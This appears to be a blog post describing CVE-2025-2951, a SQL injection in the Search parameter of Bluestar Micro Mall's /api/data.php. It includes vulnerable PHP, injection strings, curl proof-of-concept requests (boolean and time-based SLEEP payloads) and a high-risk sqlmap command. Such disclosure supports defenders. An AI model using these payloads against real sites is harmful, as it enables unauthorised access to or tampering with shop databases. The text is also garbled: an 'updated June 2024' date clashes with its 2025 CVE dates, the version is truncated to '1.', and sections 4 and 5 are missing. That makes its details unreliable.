CVE-2025-2951 - Critical SQL Injection Vulnerability in Bluestar Micro Mall 1. (`/api/data.php?Search=...`) - Technical Overview and Exploit Details

Last updated: June 2024
Author: SecurityExplained


Bluestar Micro Mall is a PHP-based e-commerce solution gaining traction with small online retailers. Recently, a severe security vulnerability — CVE-2025-2951 — was publicly disclosed, allowing remote attackers to perform a SQL Injection via the Search parameter on the /api/data.php endpoint. This post breaks down how the attack works, demonstrates it with code snippets, links to relevant resources, and discusses mitigation strategies.

> 🚨 If you use Bluestar Micro Mall 1., prioritize patching immediately — active exploitation is possible.

Software: Bluestar Micro Mall 1.

- Vulnerable file: /api/data.php
- Vulnerable parameter: Search (GET/POST)
- Impact: Authenticated or unauthenticated remote attackers can execute arbitrary SQL commands, potentially leaking, modifying, or deleting application data.

2. Technical Details

The vulnerability exists in the way /api/data.php handles user-supplied input for the Search parameter. Instead of properly sanitizing or preparing SQL queries, the user's input is directly concatenated into the SQL statement. This can allow an attacker to inject SQL code.

Vulnerable code (simplified, pseudo-PHP)

<?php
// Unsafe: Directly uses user input in SQL
$search = $_GET['Search'];
$sql = "SELECT * FROM products WHERE title LIKE '%$search%'"; // <-- vulnerable!
$result = mysqli_query($conn, $sql);
?>

If an attacker supplies a malicious Search parameter, such as

' OR 1=1 --

The resulting query becomes

SELECT * FROM products WHERE title LIKE '%' OR 1=1 -- %'

This returns all products, regardless of search filter. A more advanced attacker could further exploit this to dump database tables or even write data.

3. Public Exploit

An exploit for this vulnerability is already publicly disclosed and known to work (see exploit reference). Here’s a simple proof-of-concept, using curl:

Example 1: Dump all products

curl 'http://TARGET/api/data.php?Search=%27%20OR%201=1--';

This returns all rows in the table because 1=1 is always true.

To check for vulnerability using a time-based payload

curl 'http://TARGET/api/data.php?Search=%27%20OR%20SLEEP(5)--%20';

If the web server response is delayed by 5 seconds, the site is likely vulnerable.

With tools like sqlmap

sqlmap -u 'http://TARGET/api/data.php?Search=a'; --dbms=mysql --batch --level=5 --risk=3

Sqlmap will automatically detect the injection point and try to extract schema, tables, and data.

Sanitize Inputs: Use prepared statements (PDO, MySQLi) instead of string concatenation.

6. References

- Official CVE Entry for CVE-2025-2951
- OWASP SQL Injection Cheat Sheet
- sqlmap Project

7. Conclusion

CVE-2025-2951 is a critical SQL Injection flaw affecting Bluestar Micro Mall 1. which attackers can remotely exploit to take full control of the e-commerce site’s database. If you use this application, update it without delay, and check your logs for signs of compromise. Always sanitize input — SQL injection is preventable.

Stay safe!

If you have questions about this CVE, need help with secure coding, or want to discuss countermeasures, feel free to comment below or visit the [official Bluestar Micro Mall support page](#) (link pending).

*This post is for educational purposes only. Do not use the exploit information against systems you do not own or have permission to test.*

Timeline

Published on: 03/30/2025 12:15:27 UTC
Last modified on: 04/01/2025 20:26:30 UTC